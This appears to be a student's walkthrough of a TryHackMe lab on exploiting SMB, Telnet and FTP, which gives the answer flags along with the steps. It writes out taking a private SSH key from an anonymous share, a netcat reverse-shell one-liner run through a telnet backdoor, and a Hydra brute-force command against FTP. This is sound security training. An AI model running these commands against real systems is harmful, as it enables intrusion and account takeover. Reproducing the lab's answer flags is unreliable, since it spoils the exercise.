THM Write-Up: Network Services

This is my write-up for working through the Network Services room —
https://tryhackme.com/room/networkservices

Thanks again to the THM team for creating this platform and providing excellent learning material for us students in cyber security. :)

Before starting, I highly recommend working through the room on your own (and Nmap, if not completed yet)! This guide provides the answers, followed by an explanation on how the solution was found when applicable.

1 — Get Connected

No questions here, just be sure to activate your attack box, and each independent machine depending where you are in the lab.

2 — Understanding SMB

Takeaway: Server Message Block Protocol is mainly used for sharing resource access over a network (includes, but not limited to, files and printers).

The following answers can be found in the THM reading provided:

What does SMB stand for?

  • Answer: Server Message Block

What type of protocol is SMB?

  • Answer: response-request

What do clients connect to servers using?]

  • Answer: TCP/IP

What systems does Samba run on?

  • Answer: Unix

3 — Enumerating SMB

Per THM —

Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.

The tool Enum4Linux will be used in this section.

Conduct an nmap scan of your choosing, How many ports are open?

  • Answer: 3

Run the command nmap -sV <IP> to search for open ports. Each open port will be returned with its respective number and information on its type:

What ports is SMB running on?

  • Answer: 139/445

The SMB ports 139 and 445 are open, as seen in the screenshot above.

Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?

  • Answer: WORKGROUP

The answer can be found by running: enum4linux -N <Machine IP>

What comes up as the name of the machine?

  • Answer: POLOSMB

The answer can be found by running: enum4linux -S <Machine IP>

What operating system version is running?

  • Answer: 6.1

The answer can be found by running: enum4linux -A <Machine IP>

What share sticks out as something we might want to investigate?

  • Answer: profiles

The answer can be found by running: enum4linux -S <Machine IP>
This is something we want to investigate over the other shares due to its contents.

4 — Exploiting SMB

To access a SMB share remotely, the recommended syntax is
smbclient //<IP>/<SHARE>
Followed by the tags -U [name of user] or -p [port]

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?

  • Answer: smbclient //10.10.10.2/secret -U suit -p 445

Does the share allow anonymous access? Y/N?

  • Answer: Y

We were able to log in using a similar syntax to the previous question. To not supply a password, simply hit “enter”. Note, the commands provided via SMB are very limited.

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

  • Answer: John Cactus

Running ls lets us see that there is a text file among other interesting files we will check on later. Since we cannot just read these files, we need to run a command to pull it to our desktop:
get ‘Working From Home Information.txt’ /root/Desktop/file.txt
From here, we can click and read the new file’s contents, which are addressed to this individual.

What service has been configured to allow him to work from home?

  • Answer: SSH

This was also found and confirmed via the text file.

Okay! Now we know this, what directory on the share should we look in?

  • Answer: .ssh

Back to the Terminal, let’s look at the current directory once more through the SMB session. Since the note mentioned that Mr. Cactus is using SSH, we will want to check that out first.

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

  • Answer: id_rsa

Note the process used to create an SSH key pair for user authentication:

Once the public key has been configured on the server, the server will allow any connecting user that has the private key to log in. During the login process, the client proves possession of the private key by digitally signing the key exchange

We would definitely want id_rsa key to help us get in as it is a private key for authentication.

What is the smb.txt flag?

  • Answer: THM{smb_is_fun_eh?}

After I retrieved the key via the command: get id_rsa /root/Desktop/id_rsa
(also can download id_rsa.pub), I terminated the SMB session then changed the key permissions on my local AttackBox with: chmod 600 id_rsa

Recall enum4linux -A, we can run the command with the flag to find the user’s name at the end. Once we confirm, we can SSH into the machine using the private key to bypass authentication:

At this point, we are logged in as cactus and can use ls to see there is one text file, then use cat to view its contents — the flag.

5 — Understanding Telnet

Telnet is a legacy application protocol previously used to run commands remotely on a machine with a telnet server in place, but is no longer used since everything was sent via cleartext (no encryption) which has been provided and replaced by the introduction of SSH.

Takeaway: The command to use Telnet is telnet [ip] [port].

What is Telnet?

  • Answer: application protocol

What has slowly replaced Telnet?

  • Answer: ssh

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

  • Answer: telnet 10.10.10.3 23

The lack of what, means that all Telnet communication is in plaintext?

  • Answer: encryption

6 — Enumerating Telnet

Fair warning, this part of the lab will require some understanding of how to use Nmap.

How many ports are open on the target machine?

  • Answer: 1

Running Nmap scan will default to only give you the first 1000 ports that are *commonly* found to be open. We should ask it to check additional ports just in case Nmap missed something… Since adding the -p- flag alone would take a while (it will scan all 65535 ports), I shortened it to scan the first 10,000 ports instead:

What port is this?

  • Answer: 8012

This port is unassigned, but still lists the protocol it’s using, what protocol is this?

  • Answer: TCP

Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

  • Answer: 0

~

Based on the title returned to us, what do we think this port could be used for?

  • Answer: a backdoor

From the same Nmap scan just performed earlier, we can see part of the returned findings:

Who could it belong to? Gathering possible usernames is an important step in enumeration

  • Answer: SKIDY

See the findings (most recent screenshot above) indicating a name for who the backdoor belongs to.

7 — Exploiting Telnet

We are going to try using Telnet to test our previous findings and see if we can perform some reconnaissance.

Great! It’s an open telnet connection! What welcome message do we receive?

  • Answer: SKIDY’S BACKDOOR.

Based on the information we found earlier, we can throw the following command together: telnet <machine_IP> 8012.
Once run in via the Terminal, our answer will be found.

Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

  • Answer: Y

At first, running commands will not appear to do anything. Next, we will need to run a tcpdump listener to see whether the commands are being received at all. Since I am using AttackBox, I ran the following on a separate Terminal window:
sudo tcpdump ip proto \\icmp -i eth0

Then, back on the original Telnet session tab, I ran:
.RUN ping <AttackBox IP> -c 1

Clearly, some activity was showing in the tcpdump capture.

Now, to test a reverse shell payload.

We’re going to generate a reverse shell payload using msfvenom… What word does the generated payload start with?

  • Answer: mkfifo

I am first running the provided script with my local AttackBox IP. A raw payload can be seen, below:

What would the command look like for the listening port we selected in our payload?

  • Answer: nc -lvp 4444

Success! What is the contents of flag.txt?

  • Answer: THM{y0u_g0t_th3_t3ln3t_fl4g}

In a second Terminal window, run the netcat command. In the first Terminal window with the Telnet session, we will need to run the following with the info we grabbed from the payload created earlier:
.RUN mkfifo /tmp/nxhxk; nc 10.10.58.185 4444 0</tmp/nxhxk | /bin/sh > /tmp/nxhxk 2>&1; rm /tmp/nxhxk

The netcat tab will show a connection was received. Now we can run commands in the second terminal and look at the file.

8 — Understanding FTP

What communications model does FTP use?

  • Answer: client-server

What’s the standard FTP port?

  • Answer: 21

How many modes of FTP connection are there?

  • Answer: 2

Recall FTP supports Active (client-opened port) and Passive (server-opened port) connections.

9 — Enumerating FTP

How many ports are open on the target machine?

  • Answer: 2

You will need to run a larger scan with the -p- flag to verify the count.

What port is ftp running on?

  • Answer: 21

What variant of FTP is running on it?

  • Answer: vsftpd

What is the name of the file in the anonymous FTP directory?

  • Answer: PUBLIC_NOTICE.txt

We can see the file once we log in via ftp (username: anonymous, password is left blank) and run ls to see what is in the directory.

What do we think a possible username
could be?

  • Answer: Mike

You will need to download the file via the get command to read it, but the answer can be found inside it.

10 — Exploring FTP

We are now going to play around with a new password cracking tool called Hydra. Using the previous information we have gathered, our next steps should be fairly straight-forward.

What is the password for the user “mike”?

  • Answer: password

You may need to download the rockyou.txt file again. Using the provided command, we will need to substitute the user as Mike, the file path to point to the location of the rockyou.txt file, and the IP as the target machine’s:

hydra -t 4 -l [username] -P [rockyou.txt_file_path] -vV [target_machine_IP] ftp

The password we find is clearly not very secure. With how quickly it was discovered, this is why it’s essential to use strong and uncommon passwords. ;)

~

What is ftp.txt?

  • Answer: THM{y0u_g0t_th3_ftp_fl4g}

We will need to log in using the command: ftp [target_machine_IP]
and with Mike’s credentials. Once logged in, download the file by using get ftp.txt and the file should download to your Desktop. Go ahead and open it to find the password.

Another lab complete, well done!

Upcoming infosec professional with a passion for learning and reading all things computers, gaming, art, and cats. https://tryhackme.com/p/awildespurr